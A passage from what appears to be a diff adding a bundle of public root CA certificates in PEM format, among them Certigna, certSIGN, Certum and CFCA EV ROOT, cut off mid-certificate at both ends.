+vqRoTNoCaBZ0vrLdBORrKt03H2As2/X3oXyVtwxwhi7xOu9S98zTm/mLvg7fMbed +aFySpvXl8wo0tf97ouSHocavFwDvA5HtqRxOcT3Si2yJ9HiG5mpJoM610rCrm/b0 +1C7jcvk2xusVtyWMOvwlDbMicyF0yEqWYZL1LwsYpfSt4u5BvQF5+paMjRcCMLT5 +r3gajLQ2EBAHBXDQ9DGQilHFhiZ5shGIXsXwClTNSaa/ApzSRKft43jvRl5tcdF5 +cBxGX1HpyTfcX35pe0HfNEXgO4T0oYoKNp43zGJS4YkNKPl6I7ENPT2a/Z2B7yyQ +wHtETrtJ4A5KVpK8y7XdeReJkd5hiXSSqOMyhb5OhaRLWcsrxXiOcVTQAjeZjOVJ +6uBUcqQRBi8LjMFbvrWhsFNunLhgkR9Za/kt9JQKl7XsxXYDVBtlUrpMklZRNaBA +2CnbrlJ2Oy0wQJuK0EJWtLeIAaSHO1OWzaMWj/Nmqhexx2DgwUMFDO6bW2BvBlyH +Wyf5QBGenDPBt+U1VwV/J84XIIwc/PH72jEpSe31C4SnT8H2TsIonPru4K8H+zMR +eiFPCyEQtkA6qyI6BJyLm4SGcprSp6XEtHWRqSsjAgMBAAGjQjBAMA4GA1UdDwEB +/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgqj8ljZ9EXME66C6u +d0yEPmcM9DANBgkqhkiG9w0BAQsFAAOCAgEAuVevuBLaV4OPaAszHQNTVfSVcOQr +PbA56/qJYv331hgELyE03fFo8NWWWt7CgKPBjcZq91l3rhVkz1t5BXdm6ozTaw3d +8VkswTOlMIAVRQdFGjEitpIAq5lNOo93r6kiyi9jyhXWx8bwPWz8HA2YEGGeEaIi +1wrykXprOQ4vMMM2SZ/g6Q8CRFA3lFV96p/2O7qUpUzpvD5RtOjKkjZUbVwlKNrd +rRT90+7iIgXr0PK3aBLXWopBGsaSpVo7Y0VPv+E6dyIvXL9G+VoDhRNCX8reU9di +taY1BMJH/5n9hN9czulegChB8n3nHpDYT3Y+gjwN/KUD+nsa2UUeYNrEjvn8K8l7 +lcUq/6qJ34IxD3L/DCfXCh5WAFAeDJDBlrXYFIW7pw0WwfgHJBu6haEaBQmAupVj +yTrsJZ9/nbqkRxWbRHDxakvWOF5D8xh+UG7pWijmZeZ3Gzr9Hb4DJqPb1OG7fpYn +Kx3upPvaJVQTA945xsMfTZDsjxtK0hzthZU4UHlG1sGQUDGpXJpuHfUzVounmdLy +yCwzk5Iwx06MZTMQZBf9JBeW0Y3COmor6xOLRPIh80oat3df1+2IpHLlOR+Vnb5n +wXARPbv0+Em34yaXOp/SX3z7wJl8OSngex2/DaeP0ik0biQVy96QXr8axGbqwua6 +OV+KmalBWQewLK8= +-----END CERTIFICATE----- + +# Certigna +-----BEGIN CERTIFICATE----- +MIIDqDCCApCgAwIBAgIJAP7c4wEPyUj/MA0GCSqGSIb3DQEBBQUAMDQxCzAJBgNV +BAYTAkZSMRIwEAYDVQQKDAlEaGlteW90aXMxETAPBgNVBAMMCENlcnRpZ25hMB4X +DTA3MDYyOTE1MTMwNVoXDTI3MDYyOTE1MTMwNVowNDELMAkGA1UEBhMCRlIxEjAQ +BgNVBAoMCURoaW15b3RpczERMA8GA1UEAwwIQ2VydGlnbmEwggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQDIaPHJ1tazNHUmgh7stL7qXOEm7RFHYeGifBZ4 +QCHkYJ5ayGPhxLGWkv8YbWkj4Sti993iNi+RB7lIzw7sebYs5zRLcAglozyHGxny +gQcPOJAZ0xH+hrTy0V4eHpbNgGzOOzGTtvKg0KmVEn2lmsxryIRWijOp5yIVUxbw +zBfsV1/pogqYCd7jX5xv3EjjhQsVWqa6n6xI4wmy9/Qy3l40vhx4XUJbzg4ij02Q +130yGLMLLGq/jj8UEYkgDncUtT2UCIf3JR7VsmAA7G8qKCVuKj4YYxclPz5EIBb2 +JsglrgVKtOdjLPOMFlN+XPsRGgjBRmKfIrjxwo1p3Po6WAbfAgMBAAGjgbwwgbkw +DwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUGu3+QTmQtCRZvgHyUtVF9lo53BEw +ZAYDVR0jBF0wW4AUGu3+QTmQtCRZvgHyUtVF9lo53BGhOKQ2MDQxCzAJBgNVBAYT +AkZSMRIwEAYDVQQKDAlEaGlteW90aXMxETAPBgNVBAMMCENlcnRpZ25hggkA/tzj +AQ/JSP8wDgYDVR0PAQH/BAQDAgEGMBEGCWCGSAGG+EIBAQQEAwIABzANBgkqhkiG +9w0BAQUFAAOCAQEAhQMeknH2Qq/ho2Ge6/PAD/Kl1NqV5ta+aDY9fm4fTIrv0Q8h +bV6lUmPOEvjvKtpv6zf+EwLHyzs+ImvaYS5/1HI93TDhHkxAGYwP15zRgzB7mFnc +fca5DClMoTOi62c6ZYTTluLtdkVwj7Ur3vkj1kluPBS1xp81HlDQwY9qcEQCYsuu +HWhBp6pX6FOqB9IG9tUUBguRA3UsbHK1YZWaDYu5Def131TN3ubY1gkIl2PlwS6w +t0QmwCbAr1UwnjvVNioZBPRcHv/PLLf/0P2HQBHVESO7SMAhqaQoLf0V+LBOK/Qw +WyH8EZE0vkHve52Xdf+XlcCWWC/qu0bXu+TZLg== +-----END CERTIFICATE----- + +# Certigna Root CA +-----BEGIN CERTIFICATE----- +MIIGWzCCBEOgAwIBAgIRAMrpG4nxVQMNo+ZBbcTjpuEwDQYJKoZIhvcNAQELBQAw +WjELMAkGA1UEBhMCRlIxEjAQBgNVBAoMCURoaW15b3RpczEcMBoGA1UECwwTMDAw +MiA0ODE0NjMwODEwMDAzNjEZMBcGA1UEAwwQQ2VydGlnbmEgUm9vdCBDQTAeFw0x +MzEwMDEwODMyMjdaFw0zMzEwMDEwODMyMjdaMFoxCzAJBgNVBAYTAkZSMRIwEAYD +VQQKDAlEaGlteW90aXMxHDAaBgNVBAsMEzAwMDIgNDgxNDYzMDgxMDAwMzYxGTAX +BgNVBAMMEENlcnRpZ25hIFJvb3QgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAw +ggIKAoICAQDNGDllGlmx6mQWDoyUJJV8g9PFOSbcDO8WV43X2KyjQn+Cyu3NW9sO +ty3tRQgXstmzy9YXUnIo245Onoq2C/mehJpNdt4iKVzSs9IGPjA5qXSjklYcoW9M +CiBtnyN6tMbaLOQdLNyzKNAT8kxOAkmhVECe5uUFoC2EyP+YbNDrihqECB63aCPu +I9Vwzm1RaRDuoXrC0SIxwoKF0vJVdlB8JXrJhFwLrN1CTivngqIkicuQstDuI7pm +TLtipPlTWmR7fJj6o0ieD5Wupxj0auwuA0Wv8HT4Ks16XdG+RCYyKfHx9WzMfgIh +C59vpD++nVPiz32pLHxYGpfhPTc3GGYo0kDFUYqMwy3OU4gkWGQwFsWq4NYKpkDf +ePb1BHxpE4S80dGnBs8B92jAqFe7OmGtBIyT46388NtEbVncSVmurJqZNjBBe3Yz +IoejwpKGbvlw7q6Hh5UbxHq9MfPU0uWZ/75I7HX1eBYdpnDBfzwboZL7z8g81sWT +Co/1VTp2lc5ZmIoJlXcymoO6LAQ6l73UL77XbJuiyn1tJslV1c/DeVIICZkHJC1k +JWumIWmbat10TWuXekG9qxf5kBdIjzb5LdXF2+6qhUVB+s06RbFo5jZMm5BX7CO5 +hwjCxAnxl4YqKE3idMDaxIzb3+KhF1nOJFl0Mdp//TBt2dzhauH8XwIDAQABo4IB +GjCCARYwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYE +FBiHVuBud+4kNTxOc5of1uHieX4rMB8GA1UdIwQYMBaAFBiHVuBud+4kNTxOc5of +1uHieX4rMEQGA1UdIAQ9MDswOQYEVR0gADAxMC8GCCsGAQUFBwIBFiNodHRwczov +L3d3d3cuY2VydGlnbmEuZnIvYXV0b3JpdGVzLzBtBgNVHR8EZjBkMC+gLaArhilo +dHRwOi8vY3JsLmNlcnRpZ25hLmZyL2NlcnRpZ25hcm9vdGNhLmNybDAxoC+gLYYr +aHR0cDovL2NybC5kaGlteW90aXMuY29tL2NlcnRpZ25hcm9vdGNhLmNybDANBgkq +hkiG9w0BAQsFAAOCAgEAlLieT/DjlQgi581oQfccVdV8AOItOoldaDgvUSILSo3L +6btdPrtcPbEo/uRTVRPPoZAbAh1fZkYJMyjhDSSXcNMQH+pkV5a7XdrnxIxPTGRG +HVyH41neQtGbqH6mid2PHMkwgu07nM3A6RngatgCdTer9zQoKJHyBApPNeNgJgH6 +0BGM+RFq7q89w1DTj18zeTyGqHNFkIwgtnJzFyO+B2XleJINugHA64wcZr+shncB +lA2c5uk5jR+mUYyZDDl34bSb+hxnV29qao6pK0xXeXpXIs/NX2NGjVxZOob4Mkdi +o2cNGJHc+6Zr9UhhcyNZjgKnvETq9Emd8VRY+WCv2hikLyhF3HqgiIZd8zvn/yk1 +gPxkQ5Tm4xxvvq0OKmOZK8l+hfZx6AYDlf7ej0gcWtSS6Cvu5zHbugRqh5jnxV/v +faci9wHYTfmJ0A6aBVmknpjZbyvKcL5kwlWj9Omvw5Ip3IgWJJk8jSaYtlu3zM63 +Nwf9JtmYhST/WSMDmu2dnajkXjjO11INb9I/bbEFa0nOipFGc/T2L/Coc3cOZayh +jWZSaX5LaAzHHjcng6WMxwLkFM1JAbBzs/3GkDpv0mztO+7skb6iQ12LAEpmJURw +3kAP+HwV96LOPNdeE4yBFxgX0b3xdxA61GU5wSesVywlVP+i2k+KYTlerj1KjL0= +-----END CERTIFICATE----- + +# certSIGN ROOT CA +-----BEGIN CERTIFICATE----- +MIIDODCCAiCgAwIBAgIGIAYFFnACMA0GCSqGSIb3DQEBBQUAMDsxCzAJBgNVBAYT +AlJPMREwDwYDVQQKEwhjZXJ0U0lHTjEZMBcGA1UECxMQY2VydFNJR04gUk9PVCBD +QTAeFw0wNjA3MDQxNzIwMDRaFw0zMTA3MDQxNzIwMDRaMDsxCzAJBgNVBAYTAlJP +MREwDwYDVQQKEwhjZXJ0U0lHTjEZMBcGA1UECxMQY2VydFNJR04gUk9PVCBDQTCC +ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALczuX7IJUqOtdu0KBuqV5Do +0SLTZLrTk+jUrIZhQGpgV2hUhE28alQCBf/fm5oqrl0Hj0rDKH/v+yv6efHHrfAQ +UySQi2bJqIirr1qjAOm+ukbuW3N7LBeCgV5iLKECZbO9xSsAfsT8AzNXDe3i+s5d +RdY4zTW2ssHQnIFKquSyAVwdj1+ZxLGt24gh65AIgoDzMKND5pCCrlUoSe1b16kQ +OA7+j0xbm0bqQfWwCHTD0IgztnzXdN/chNFDDnU5oSVAKOp4yw4sLjmdjItuFhwv +JoIQ4uNllAoEwF73XVv4EOLQunpL+943AAAaWyjj0pxzPjKHmKHJUS/X3qwzs08C +AwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAcYwHQYDVR0O +BBYEFOCMm9slSbPxfIbWskKHC9BroNnkMA0GCSqGSIb3DQEBBQUAA4IBAQA+0hyJ +LjX8+HXd5n9liPRyTMks1zJO890ZeUe9jjtbkw9QSSQTaxQGcu8J06Gh40CEyecY +MnQ8SG4Pn0vU9x7Tk4ZkVJdjclDVVc/6IJMCopvDI5NOFlV2oHB5bc0hH88vLbwZ +44gx+FkagQnIl6Z0x2DEW8xXjrJ1/RsCCdtZb3KTafcxQdaIOL+Hsr0Wefmq5L6I +Jd1hJyMctTEHBDa0GpC9oHRxUIltvBTjD4au8as+x6AJzKNI0eDbZOeStc+vckNw +i/nDhDwTqn6Sm1dTk/pwwpEOMfmbZ13pljheX7NzTogVZ96edhBiIL5VaZVDADlN +9u6wWk5JRFRYX0KD +-----END CERTIFICATE----- + +# certSIGN Root CA G2 +-----BEGIN CERTIFICATE----- +MIIFRzCCAy+gAwIBAgIJEQA0tk7GNi02MA0GCSqGSIb3DQEBCwUAMEExCzAJBgNV +BAYTAlJPMRQwEgYDVQQKEwtDRVJUU0lHTiBTQTEcMBoGA1UECxMTY2VydFNJR04g +Uk9PVCBDQSBHMjAeFw0xNzAyMDYwOTI3MzVaFw00MjAyMDYwOTI3MzVaMEExCzAJ +BgNVBAYTAlJPMRQwEgYDVQQKEwtDRVJUU0lHTiBTQTEcMBoGA1UECxMTY2VydFNJ +R04gUk9PVCBDQSBHMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMDF +dRmRfUR0dIf+DjuW3NgBFszuY5HnC2/OOwppGnzC46+CjobXXo9X69MhWf05N0Iw +vlDqtg+piNguLWkh59E3GE59kdUWX2tbAMI5Qw02hVK5U2UPHULlj88F0+7cDBrZ +uIt4ImfkabBoxTzkbFpG583H+u/E7Eu9aqSs/cwoUe+StCmrqzWaTOTECMYmzPhp +n+Sc8CnTXPnGFiWeI8MgwT0PPzhAsP6CRDiqWhqKa2NYOLQV07YRaXseVO6MGiKs +cpc/I1mbySKEwQdPzH/iV8oScLumZfNpdWO9lfsbl83kqK/20U6o2YpxJM02PbyW +xPFsqa7lzw1uKA2wDrXKUXt4FMMgL3/7FFXhEZn91QqhngLjYl/rNUssuHLoPj1P +rCy7Lobio3aP5ZMqz6WryFyNSwb/EkaseMsUBzXgqd+L6a8VTxaJW732jcZZroiF +DsGJ6x9nxUWO/203Nit4ZoORUSs9/1F3dmKh7Gc+PoGD4FapUB8fepmrY7+EF3fx +DTvf95xhszWYijqy7DwaNz9+j5LP2RIUZNoQAhVB/0/E6xyjyfqZ90bp4RjZsbgy +LcsUDFDYg2WD7rlcz8sFWkz6GZdr1l0T08JcVLwyc6B49fFtHsufpaafItzRUZ6C +eWRgKRM+o/1Pcmqr4tTluCRVLERLiohEnMqE0yo7AgMBAAGjQjBAMA8GA1UdEwEB +/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBSCIS1mxteg4BXrzkwJ +d8RgnlRuAzANBgkqhkiG9w0BAQsFAAOCAgEAYN4auOfyYILVAzOBywaK8SJJ6ejq +kX/GM15oGQOGO0MBzwdw5AgeZYWR5hEit/UCI46uuR59H35s5r0l1ZUa8gWmr4UC +b6741jH/JclKyMeKqdmfS0mbEVeZkkMR3rYzpMzXjWR91M08KCy0mpbqTfXERMQl +qiCA2ClV9+BB/AYm/7k29UMUA2Z44RGx2iBfRgB4ACGlHgAoYXhvqAEBj500mv/0 +OJD7uNGzcgbJceaBxXntC6Z58hMLnPddDnskk7RI24Zf3lCGeOdA5jGokHZwYa+c +NywRtYK3qq4kNFtyDGkNzVmf9nGvnAvRCjj5BiKDUyUM/FHE5r7iOZULJK2v0ZXk +ltd0ZGtxTgI8qoXzIKNDOXZbbFD+mpwUHmUUihW9o4JFWklWatKcsWMy5WHgUyIO +pwpJ6st+H6jiYoD2EEVSmAYY3qXNL3+q1Ok+CHLsIwMCPKaq2LxndD0UF/tUSxfj +03k9bWtJySgOLnRQvwzZRjoQhsmnP+mg7H/rpXdYaXHmgwo38oZJar55CJD2AhZk +PuXaTH4MNMn5X7azKFGnpyuqSfqNZSlO42sTp5SjLVFteAxEy9/eCG/Oo2Sr05WE +1LlSVHJ7liXMvGnjSG4N0MedJ5qq+BOS3R7fY581qRY27Iy4g/Q9iY/NtBde17MX +QRBdJ3NghVdJIgc= +-----END CERTIFICATE----- + +# Certum EC-384 CA +-----BEGIN CERTIFICATE----- +MIICZTCCAeugAwIBAgIQeI8nXIESUiClBNAt3bpz9DAKBggqhkjOPQQDAzB0MQsw +CQYDVQQGEwJQTDEhMB8GA1UEChMYQXNzZWNvIERhdGEgU3lzdGVtcyBTLkEuMScw +JQYDVQQLEx5DZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxGTAXBgNVBAMT +EENlcnR1bSBFQy0zODQgQ0EwHhcNMTgwMzI2MDcyNDU0WhcNNDMwMzI2MDcyNDU0 +WjB0MQswCQYDVQQGEwJQTDEhMB8GA1UEChMYQXNzZWNvIERhdGEgU3lzdGVtcyBT +LkEuMScwJQYDVQQLEx5DZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxGTAX +BgNVBAMTEENlcnR1bSBFQy0zODQgQ0EwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAATE +KI6rGFtqvm5kN2PkzeyrOvfMobgOgknXhimfoZTy42B4mIF4Bk3y7JoOV2CDn7Tm +Fy8as10CW4kjPMIRBSqniBMY81CE1700LCeJVf/OTOffph8oxPBUw7l8t1Ot68Kj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI0GZnQkdjrzife81r1HfS+8 +EF9LMA4GA1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNoADBlAjADVS2m5hjEfO/J +UG7BJw+ch69u1RsIGL2SKcHvlJF40jocVYli5RsJHrpka/F2tNQCMQC0QoSZ/6vn +nvuRlydd3LBbMHHOXjgaatkl5+r3YZJW+OraNsKHZZYuciUvf9/DE8k= +-----END CERTIFICATE----- + +# Certum Trusted Network CA +-----BEGIN CERTIFICATE----- +MIIDuzCCAqOgAwIBAgIDBETAMA0GCSqGSIb3DQEBBQUAMH4xCzAJBgNVBAYTAlBM +MSIwIAYDVQQKExlVbml6ZXRvIFRlY2hub2xvZ2llcyBTLkEuMScwJQYDVQQLEx5D +ZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxIjAgBgNVBAMTGUNlcnR1bSBU +cnVzdGVkIE5ldHdvcmsgQ0EwHhcNMDgxMDIyMTIwNzM3WhcNMjkxMjMxMTIwNzM3 +WjB+MQswCQYDVQQGEwJQTDEiMCAGA1UEChMZVW5pemV0byBUZWNobm9sb2dpZXMg +Uy5BLjEnMCUGA1UECxMeQ2VydHVtIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MSIw +IAYDVQQDExlDZXJ0dW0gVHJ1c3RlZCBOZXR3b3JrIENBMIIBIjANBgkqhkiG9w0B +AQEFAAOCAQ8AMIIBCgKCAQEA4/t9o3K6wvDJFIf1awFO4W5AB7ptJ11/91sts1rH +UV+rpDKmYYe2bg+G0jACl/jXaVehGDldamR5xgFZrDwxSjh80gTSSyjoIF87B6LM +TXPb865Px1bVWqeWifrzq2jUI4ZZJ88JJ7ysbnKDHDBy3+Ci6dLhdHUZvSqeexVU +BBvXQzmtVSjF4hq79MDkrjhJM8x2hZ85RdKknvISjFH4fOQtf/WsX+sWn7Et0brM +kUJ3TCXJkDhv2/DM+44el1k+1WBO5gUo7Ul5E0u6SNsv+XLTOcr+H9g0cvW0QM8x +AcPs3hEtF10fuFDRXhmnad4HMyjKUJX5p1TLVIZQRan5SQIDAQABo0IwQDAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBQIds3LB/8k9sXN7buQvOKEN0Z19zAOBgNV +HQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQEFBQADggEBAKaorSLOAT2mo/9i0Eidi15y +sHhE49wcrwn9I0j6vSrEuVUEtRCjjSfeC4Jj0O7eDDd5QVsisrCaQVymcODU0HfL +I9MA4GxWL+FpDQ3Zqr8hgVDZBqWo/5U30Kr+4rP1mS1FhIrlQgnXdAIv94nYmem8 +J9RHjboNRhx3zxSkHLmkMcScKHQDNP8zGSal6Q10tz6XxnboJ5ajZt3hrvJBW8qY +VoNzcOSGGtIxQbovvi0TWnZvTuhOgQ4/WwMioBK+ZlgRSssDxLQqKi2WF+A5VLxI +03YnnZotBqbJ7DnSq9ufmgsnAjUpsUCV5/nonFWIGUbWtzT1fs45mtk48VH3Tyw= +-----END CERTIFICATE----- + +# Certum Trusted Network CA 2 +-----BEGIN CERTIFICATE----- +MIIF0jCCA7qgAwIBAgIQIdbQSk8lD8kyN/yqXhKN6TANBgkqhkiG9w0BAQ0FADCB +gDELMAkGA1UEBhMCUEwxIjAgBgNVBAoTGVVuaXpldG8gVGVjaG5vbG9naWVzIFMu +QS4xJzAlBgNVBAsTHkNlcnR1bSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEkMCIG +A1UEAxMbQ2VydHVtIFRydXN0ZWQgTmV0d29yayBDQSAyMCIYDzIwMTExMDA2MDgz +OTU2WhgPMjA0NjEwMDYwODM5NTZaMIGAMQswCQYDVQQGEwJQTDEiMCAGA1UEChMZ +VW5pemV0byBUZWNobm9sb2dpZXMgUy5BLjEnMCUGA1UECxMeQ2VydHVtIENlcnRp +ZmljYXRpb24gQXV0aG9yaXR5MSQwIgYDVQQDExtDZXJ0dW0gVHJ1c3RlZCBOZXR3 +b3JrIENBIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC9+Xj45tWA +DGSdhhuWZGc/IjoedQF97/tcZ4zJzFxrqZHmuULlIEub2pt7uZld2ZuAS9eEQCsn +0+i6MLs+CRqnSZXvK0AkwpfHp+6bJe+oCgCXhVqqndwpyeI1B+twTUrWwbNWuKFB +OJvR+zF/j+Bf4bE/D44WSWDXBo0Y+aomEKsq09DRZ40bRr5HMNUuctHFY9rnY3lE +fktjJImGLjQ/KUxSiyqnwOKRKIm5wFv5HdnnJ63/mgKXwcZQkpsCLL2puTRZCr+E +Sv/f/rOf69me4Jgj7KZrdxYq28ytOxykh9xGc14ZYmhFV+SQgkK7QtbwYeDBoz1m +o130GO6IyY0XRSmZMnUCMe4pJshrAua1YkV/NxVaI2iJ1D7eTiew8EAMvE0Xy02i +sx7QBlrd9pPPV3WZ9fqGGmd4s7+W/jTcvedSVuWz5XV710GRBdxdaeOVDUO5/IOW +OZV7bIBaTxNyxtd9KXpEulKkKtVBRgkg/iKgtlswjbyJDNXXcPiHUv3a76xRLgez +Tv7QCdpw75j6VuZt27VXS9zlLCUVyJ4ueE742pyehizKV/Ma5ciSixqClnrDvFAS +adgOWkaLOusm+iPJtrCBvkIApPjW/jAux9JG9uWOdf3yzLnQh1vMBhBgu4M1t15n +3kfsmUjxpKEV/q2MYo45VU85FrmxY53/twIDAQABo0IwQDAPBgNVHRMBAf8EBTAD +AQH/MB0GA1UdDgQWBBS2oVQ5AsOgP46KvPrU+Bym0ToO/TAOBgNVHQ8BAf8EBAMC +AQYwDQYJKoZIhvcNAQENBQADggIBAHGlDs7k6b8/ONWJWsQCYftMxRQXLYtPU2sQ +F/xlhMcQSZDe28cmk4gmb3DWAl45oPePq5a1pRNcgRRtDoGCERuKTsZPpd1iHkTf +CVn0W3cLN+mLIMb4Ck4uWBzrM9DPhmDJ2vuAL55MYIR4PSFk1vtBHxgP58l1cb29 +XN40hz5BsA72udY/CROWFC/emh1auVbONTqwX3BNXuMp8SMoclm2q8KMZiYcdywm +djWLKKdpoPk79SPdhRB0yZADVpHnr7pH1BKXESLjokmUbOe3lEu6LaTaM4tMpkT/ +WjzGHWTYtTHkpjx6qFcL2+1hGsvxznN3Y6SHb0xRONbkX8eftoEq5IVIeVheO/jb +AoJnwTnbw3RLPTYe+SmTiGhbqEQZIfCn6IENLOiTNrQ3ssqwGyZ6miUfmpqAnksq +P/ujmv5zMnHCnsZy4YpoJ/HkD7TETKVhk/iXEAcqMCWpuchxuO9ozC1+9eB+D4Ko +b7a6bINDd82Kkhehnlt4Fj1F4jNy3eFmypnTycUm/Q1oBEauttmbjL4ZvrHG8hnj +XALKLNhvSgfZyTXaQHXyxKcZb55CEJh15pWLYLztxRLXis7VmFxWlgPF7ncGNf/P +5O4/E2Hu29othfDNrp2yGAlFw5Khchf8R7agCyzxxN5DaAhqXzvwdmP7zAYspsbi +DrW5viSP +-----END CERTIFICATE----- + +# Certum Trusted Root CA +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# CFCA EV ROOT +-----BEGIN CERTIFICATE----- +MIIFjTCCA3WgAwIBAgIEGErM1jANBgkqhkiG9w0BAQsFADBWMQswCQYDVQQGEwJD +TjEwMC4GA1UECgwnQ2hpbmEgRmluYW5jaWFsIENlcnRpZmljYXRpb24gQXV0aG9y +aXR5MRUwEwYDVQQDDAxDRkNBIEVWIFJPT1QwHhcNMTIwODA4MDMwNzAxWhcNMjkx +MjMxMDMwNzAxWjBWMQswCQYDVQQGEwJDTjEwMC4GA1UECgwnQ2hpbmEgRmluYW5j +aWFsIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MRUwEwYDVQQDDAxDRkNBIEVWIFJP +T1QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDXXWvNED8fBVnVBU03 +sQ7smCuOFR36k0sXgiFxEFLXUWRwFsJVaU2OFW2fvwwbwuCjZ9YMrM8irq93VCpL +TIpTUnrD7i7es3ElweldPe6hL6P3KjzJIx1qqx2hp/Hz7KDVRM8Vz3IvHWOX6Jn5 +/ZOkVIBMUtRSqy5J35DNuF++P96hyk0g1CXohClTt7GIH//62pCfCqktQT+x8Rgp +7hZZLDRJGqgG16iI0gNyejLi6mhNbiyWZXvKWfry4t3uMCz7zEasxGPrb382KzRz +EpR/38wmnvFyXVBlWY9ps4deMm/DGIq1lY+wejfeWkU7xzbh72fROdOXW3NiGUgt +hxwG+3SYIElz8AXSG7Ggo7cbcNOIabla1jj0Ytwli3i/+Oh+uFzJlU9fpy25IGvP +a931DfSCt/SyZi4QKPaXWnuWFo8BGS1sbn85WAZkgwGDg8NNkt0yxoekN+kWzqot +aK8KgWU6cMGbrU1tVMoqLUuFG7OA5nBFDWteNfB/O7ic5ARwiRIlk9oKmSJgamNg +TnYGmE69g60dWIolhdLHZR4tjsbftsbhf4oEIRUpdPA+nJCdDC7xij5aqgwJHsfV +PKPtl8MeNPo4+QgO48BdK4PRVmrJtqhUUy54Mmc9gn900PvhtgVguXDbjgv5E1hv +cWAQUhC5wUEJ73IfZzF4/5YFjQIDAQABo2MwYTAfBgNVHSMEGDAWgBTj/i39KNAL 